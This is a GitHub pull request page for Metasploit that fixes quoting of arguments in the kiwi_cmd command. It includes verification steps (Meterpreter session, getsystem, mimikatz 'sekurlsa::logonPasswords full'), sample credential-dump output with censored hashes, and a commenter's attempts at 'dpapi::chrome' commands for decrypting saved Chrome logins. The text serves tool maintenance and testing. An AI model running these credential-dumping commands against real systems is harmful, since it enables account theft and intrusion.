Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Wrap kiwi cmd arguments in quotes #14802

Merged
merged 1 commit into from
Feb 24, 2021
Merged

Wrap kiwi cmd arguments in quotes #14802

merged 1 commit into from
Feb 24, 2021

Conversation

dwelch-r7
Copy link
Contributor

@dwelch-r7 dwelch-r7 commented Feb 24, 2021
edited by gwillcox-r7
Loading

Resolves #14136

Kiwi expects commands with an argument to be wrapped in quotes but we weren't doing that even when the user would wrap it in quotes one the meterpreter prompt. This PR resolves that by wrapping each command in quotes so kiwi can parse it correctly

Verification

  • Get a native meterpreter shell on windows (i.e. using windows/x64/meterpreter_reverse_http)
  • Interact with the session sessions -1
  • Run getsystem (some kiwi commands require a privileged account)
  • Run load kiwi
  • Run kiwi_cmd "sekurlsa::logonPasswords full"
  • You should see a line like this mimikatz(powershell) # sekurlsa::logonPasswords full previously the full would be run as a separate command which does not work

@gwillcox-r7 gwillcox-r7 self-assigned this Feb 24, 2021
@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Feb 24, 2021
edited
Loading

Before: 
meterpreter > kiwi_cmd "sekurlsa::logonPasswords full"
*redacted output*
mimikatz(powershell) # full
ERROR mimikatz_doLocal ; "full" command of "standard" module not found !

Module :	standard
Full name :	Standard module
Description :	Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

meterpreter >
After: 
meterpreter > kiwi_cmd "sekurlsa::logonPasswords full"

Authentication Id : 0 ; 11780027 (00000000:00b3bfbb)
Session           : RemoteInteractive from 2
User Name         : Administrator
Domain            : WIN-QKA9JKS5MVU
Logon Server      : WIN-QKA9JKS5MVU
Logon Time        : 2/19/2021 10:16:49 AM
SID               : S-1-5-21-2479325116-3149349649-1743567484-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * NTLM     : *censored*
	 * SHA1     : *censored*
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 11752265 (00000000:00b35349)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/18/2021 4:53:57 PM
SID               : S-1-5-90-0-2
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 11751839 (00000000:00b3519f)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/18/2021 4:53:57 PM
SID               : S-1-5-90-0-2
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 84122 (00000000:0001489a)
Session           : Service from 0
User Name         : WMI Mapper
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-2306818404-1449075829-5196792-1933587401-709886547
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 82177 (00000000:00014101)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : SQLTELEMETRY$SQLEXPRESS
	 * Domain   : NT Service
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 80875 (00000000:00013beb)
Session           : Service from 0
User Name         : Administrator
Domain            : WIN-QKA9JKS5MVU
Logon Server      : WIN-QKA9JKS5MVU
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-21-2479325116-3149349649-1743567484-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * NTLM     : *censored*
	 * SHA1     : *censored*
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 43820 (00000000:0000ab2c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-90-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-QKA9JKS5MVU$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-20
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : win-qka9jks5mvu$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 22946 (00000000:000059a2)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : 
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 83340 (00000000:0001458c)
Session           : Service from 0
User Name         : WbemConsumer
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-3833276825-528460201-2555912059-1703007875-3587489905
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 81702 (00000000:00013f26)
Session           : Service from 0
User Name         : MSSQL$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : MSSQL$SQLEXPRESS
	 * Domain   : NT Service
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 81688 (00000000:00013f18)
Session           : Service from 0
User Name         : Administrator
Domain            : WIN-QKA9JKS5MVU
Logon Server      : WIN-QKA9JKS5MVU
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-21-2479325116-3149349649-1743567484-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * NTLM     : *censored*
	 * SHA1     : *censored*
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 43875 (00000000:0000ab63)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-90-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-QKA9JKS5MVU$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : win-qka9jks5mvu$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

meterpreter >

gwillcox-r7
gwillcox-r7 approved these changes Feb 24, 2021
View reviewed changes
Copy link
Contributor

@gwillcox-r7 gwillcox-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Proposed code changes look good to land, thanks for referencing the quote from the official wiki as well for passersbys!

@gwillcox-r7
Copy link
Contributor

Tests complete and code looks good! Landing now...

@gwillcox-r7 gwillcox-r7 merged commit 8f1ad11 into rapid7:master Feb 24, 2021
@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Feb 24, 2021
edited by pbarry-r7
Loading

Release Notes

Fixed a bug involving the Kiwi library where commands passed to Kiwi via the kiwi_cmd command in Metasploit were not properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it separate commands to execute rather than one space-separated command.

@adfoster-r7 adfoster-r7 mentioned this pull request Aug 31, 2021
Closed
@ForDockerImage
Copy link

ForDockerImage commented Aug 31, 2021
edited
Loading

Release Notes

Fixed a bug involving the Kiwi library where commands passed to Kiwi via the kiwi_cmd command in Metasploit were not properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it separate commands to execute rather than one space-separated command.

thanks for trying to help solve my problem, but nothing works for me :)

Does not work for me:

kiwi_cmd "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User\\ Data\\Default\\Login\\ Data\" /unprotect"
kiwi_cmd "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User\ Data\\Default\\Login\ Data\" /unprotect"
kiwi_cmd "dpapi::chrome /in:"%localappdata%\Google\Chrome\User\ Data\Default\Login\\ Data" /unprotect"
kiwi_cmd "dpapi::chrome /in:'%localappdata%\Google\Chrome\User\ Data\Default\Login\\ Data' /unprotect"`

from .rc script

cmd = "dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect"
cmd = Shellwords.escape(cmd)
run_single(cmd)

My method cmd_kiwi_cmd:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb

  def cmd_kiwi_cmd(*args)
    # Kiwi expects instructions with arguments to be quoted so quote everything to be sure
    # "You can pass instructions on mimikatz command line, those with arguments/spaces must be quoted."
    # Quote from: https://github.com/gentilkiwi/mimikatz/wiki
    output = client.kiwi.exec_cmd(args.map { |s| '"' + s + '"'}.join(' '))
    print_line(output)
  end

Is there anyone who tested it and who knows how to fix it?)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@gwillcox-r7 gwillcox-r7 gwillcox-r7 approved these changes

Assignees

@gwillcox-r7 gwillcox-r7

Labels
bug easy library rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

kiwi_cmd does not correctly handle commands with multiple arguments
3 participants
@dwelch-r7 @gwillcox-r7 @ForDockerImage